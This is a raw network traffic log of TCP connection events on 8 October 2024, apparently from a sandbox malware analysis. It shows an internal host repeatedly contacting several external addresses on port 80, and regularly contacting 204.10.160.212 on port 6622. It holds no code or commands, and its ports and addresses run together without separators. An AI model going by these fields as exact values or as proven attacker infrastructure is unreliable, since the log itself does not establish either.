                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.335050106 CEST5651980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.340116024 CEST805651954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.340290070 CEST805651954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.414511919 CEST5651980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.430140972 CEST5652080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.436027050 CEST805652054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.436105013 CEST5652080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.436733007 CEST5652080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.436769009 CEST5652080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.442068100 CEST805652054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.442460060 CEST805652054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.537050962 CEST565216622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.542700052 CEST662256521204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.542818069 CEST565216622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.547956944 CEST565216622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.552892923 CEST662256521204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.157670021 CEST805652054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.158220053 CEST805652054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.158632040 CEST5652080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.162678957 CEST5652080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.167625904 CEST805652054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.202090979 CEST5652280192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.207154036 CEST805652244.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.207403898 CEST5652280192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.209211111 CEST5652280192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.209211111 CEST5652280192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.214085102 CEST805652244.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.214149952 CEST805652244.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.708611012 CEST805652244.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.708623886 CEST805652244.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.708770037 CEST5652280192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.708942890 CEST5652280192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.713784933 CEST805652244.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.791698933 CEST5652380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.797072887 CEST805652354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.797175884 CEST5652380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.797679901 CEST5652380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.797679901 CEST5652380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.802896976 CEST805652354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.802911997 CEST805652354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.002942085 CEST662256521204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.003026009 CEST565216622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.004153967 CEST565216622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.009123087 CEST662256521204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.519073009 CEST805652354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.520519018 CEST805652354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.520611048 CEST5652380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.628437996 CEST565246622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.633863926 CEST662256524204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.633940935 CEST565246622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.753962040 CEST565246622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.760217905 CEST662256524204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.794284105 CEST5652380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.799279928 CEST805652354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.887854099 CEST5652580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.892839909 CEST805652518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.892909050 CEST5652580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.893356085 CEST5652580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.893378019 CEST5652580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.898354053 CEST805652518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.898364067 CEST805652518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.116724014 CEST662256524204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.116800070 CEST565246622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.116942883 CEST565246622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.122741938 CEST662256524204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.235837936 CEST805652518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.236016989 CEST5652580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.236313105 CEST805652518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.236360073 CEST5652580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.241792917 CEST805652518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.318342924 CEST565266622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.324347019 CEST662256526204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.324784994 CEST565266622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.328541040 CEST565266622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.333441973 CEST662256526204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.390399933 CEST5652780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.396089077 CEST805652754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.396306992 CEST5652780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.405246019 CEST5652780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.410567999 CEST805652754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.418103933 CEST5652780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.423471928 CEST805652754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.160432100 CEST805652754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.160552979 CEST805652754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.160681009 CEST5652780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.735460043 CEST5652780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.740675926 CEST805652754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.814527035 CEST662256526204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.814778090 CEST565266622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.814810038 CEST565266622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.820628881 CEST662256526204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.921260118 CEST5652880192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.926778078 CEST805652844.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.926894903 CEST5652880192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.927572012 CEST5652880192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.927711964 CEST5652880192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.933114052 CEST805652844.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.933142900 CEST805652844.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.036567926 CEST565296622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.042511940 CEST662256529204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.042584896 CEST565296622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.046644926 CEST565296622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.051733017 CEST662256529204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.403438091 CEST805652844.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.403610945 CEST805652844.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.403670073 CEST5652880192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.403748989 CEST5652880192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.408746004 CEST805652844.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.418673992 CEST5653080192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.423604965 CEST8056530172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.423703909 CEST5653080192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.423870087 CEST5653080192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.423891068 CEST5653080192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.429116964 CEST8056530172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.429168940 CEST8056530172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.908648968 CEST8056530172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.908817053 CEST5653080192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.908817053 CEST5653080192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.910445929 CEST5653180192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.913712978 CEST8056530172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.915441036 CEST8056531172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.915529013 CEST5653180192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.923038006 CEST5653180192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.923038006 CEST5653180192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.927983999 CEST8056531172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.927994967 CEST8056531172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.409563065 CEST8056531172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.409719944 CEST5653180192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.409986019 CEST5653180192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.415116072 CEST8056531172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.437422037 CEST5653280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.443074942 CEST805653218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.443360090 CEST5653280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.443439007 CEST5653280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.443486929 CEST5653280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.449413061 CEST805653218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.449657917 CEST805653218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.525258064 CEST662256529204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.525387049 CEST565296622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.525537968 CEST565296622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.530261040 CEST662256529204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.708530903 CEST805032382.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.708753109 CEST5032380192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.709903955 CEST5032380192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.714868069 CEST805032382.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.719281912 CEST5653380192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.724258900 CEST565346622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.724785089 CEST805653382.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.724855900 CEST5653380192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.725863934 CEST5653380192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.725863934 CEST5653380192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.729440928 CEST662256534204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.729716063 CEST565346622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.730784893 CEST805653382.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.730869055 CEST805653382.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.734004974 CEST565346622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.739808083 CEST662256534204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:02.411467075 CEST5653280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:02.414711952 CEST5653580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:02.420619965 CEST805653518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:02.422983885 CEST5653580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:02.422983885 CEST5653580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:02.423029900 CEST5653580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:02.429060936 CEST805653518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:02.429079056 CEST805653518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.189133883 CEST662256534204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.189218044 CEST565346622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.189280987 CEST565346622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.194259882 CEST662256534204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.380091906 CEST565366622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.385266066 CEST662256536204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.385363102 CEST565366622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.390935898 CEST565366622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.396073103 CEST662256536204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.776742935 CEST805653518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.777033091 CEST5653580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.777236938 CEST805653518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.777297974 CEST5653580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.782242060 CEST805653518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.818325043 CEST5653780192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.823486090 CEST805653782.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.823651075 CEST5653780192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.823853970 CEST5653780192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.823873997 CEST5653780192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.829025030 CEST805653782.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.829037905 CEST805653782.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:04.868711948 CEST662256536204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:04.868931055 CEST565366622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:04.868931055 CEST565366622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:04.873935938 CEST662256536204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:05.052021027 CEST565386622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:05.227694035 CEST662256538204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:05.227830887 CEST565386622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:05.231504917 CEST565386622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:05.500051975 CEST662256538204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:06.411221027 CEST5653780192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:06.414630890 CEST5653980192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:06.419699907 CEST805653982.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:06.419781923 CEST5653980192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:06.419984102 CEST5653980192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:06.419998884 CEST5653980192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:06.424913883 CEST805653982.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:06.424923897 CEST805653982.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:06.992072105 CEST662256538204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:06.992235899 CEST565386622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:06.996181011 CEST565386622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:07.000997066 CEST662256538204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:07.187825918 CEST565406622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:07.192866087 CEST662256540204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:07.192933083 CEST565406622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:07.222883940 CEST565406622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:07.228035927 CEST662256540204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:08.695571899 CEST662256540204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:08.698793888 CEST565406622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:08.698906898 CEST565406622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:08.703823090 CEST662256540204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:08.864682913 CEST565416622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:08.869738102 CEST662256541204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:08.869822025 CEST565416622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:08.873538017 CEST565416622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:08.878392935 CEST662256541204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:10.352190018 CEST662256541204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:10.352292061 CEST565416622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:10.352391005 CEST565416622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:10.357929945 CEST662256541204.10.160.212192.168.2.4
